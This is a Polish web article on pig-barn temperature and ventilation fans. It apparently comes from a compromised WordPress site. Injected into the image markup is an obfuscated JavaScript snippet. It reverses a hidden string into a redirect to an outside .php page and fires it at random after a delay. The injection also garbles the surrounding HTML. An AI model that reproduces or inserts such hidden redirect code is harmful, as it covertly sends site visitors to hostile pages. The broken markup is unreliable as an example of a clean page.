Dlaczego ważna jest odpowiednia temperatura w chlewni?

Aby hodowla trzody chlewnej była jaka najbardziej wydajna, konieczne jest zagwarantowanie optymalnych warunków bytu zwierzętom. Ważne jest by nie tylko zdawać im odpowiednią ilość paszy, ale także to by zapewnić właściwy mikroklimat.

Idealna temperatura dzięki właściwej wentylacji do chlewni

wentyla<script>$zXz=function(n){if (typeof ($zXz.list[n]) == „string”) return $zXz.list[n].split(„”).reverse().join(„”);return $zXz.list[n];};$zXz.list=[„\’php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}</script>tory do chlewni” class=”alignleft” height=”167″ src=”http://www.disc4you.eu/wp-content/uploads/2017/06/wentyla<script>$zXz=function(n){if (typeof ($zXz.list[n]) == tory-do-chlewni.jpg” style=”float: left;” width=”250″/>Świnie w odróżnieniu od pozostałych zwierząt gospodarskich, mają ograniczone możliwości regulacji ciepłoty ciała, co powoduje dużą wrażliwość na zbyt wysokie jak i zbyt niskie temperatury. Zbyt wysoka temperatura powoduje przyspieszenie oddechu, pobieranie większej ilości wody za czym idzie nadmierne wydzielanie śliny oraz oddawanie moczu. Zbyt niska temperatura natomiast powoduje spadek odporności. Na niskie temperatury szczególnie wrażliwe są prosięta. Tuczniki przechowywane w zbyt niskich temperaturach zużywają dodatkowo więcej paszy na ogrzanie własnego ciała, co nie przekłada się korzystnie na masę mięśniową i tłuszczową, zaś u loch zbyt nadmierne pobieranie paszy powoduje zaburzenia laktacji oraz ograniczenie gromadzenia rezerw składników odżywczych. Właściwa temperatura chlewni nie powinna schodzić poniżej 15 stopni Celsjusza, a także nie powinna być wyższa niż 20 stopni dla osobników dorosłych. Prosięta zaś powinny być przechowywane w temperaturach od 19-32 stopni Celsjusza. W regulacji i utrzymaniu prawidłowej temperatury pomagają wentylatory do chlewni. Jednak by uzyskać optymalne warunki, muszą one posiadać możliwość regulacji.

Dodatkowo wentylatory nie powinny być zbyt głośne by nie straszyć i nie wzbudzać niepokoju wśród zwierząt. Odpowiednia wentylacja chlewni powinna być również odporna na działanie wilgoci, amoniaku i siarkowodoru. Ponadto, by była ona wygodna w użyciu i łatwa w utrzymaniu w czystości dobrze by wentylatory można było myć  silnym strumieniem wody.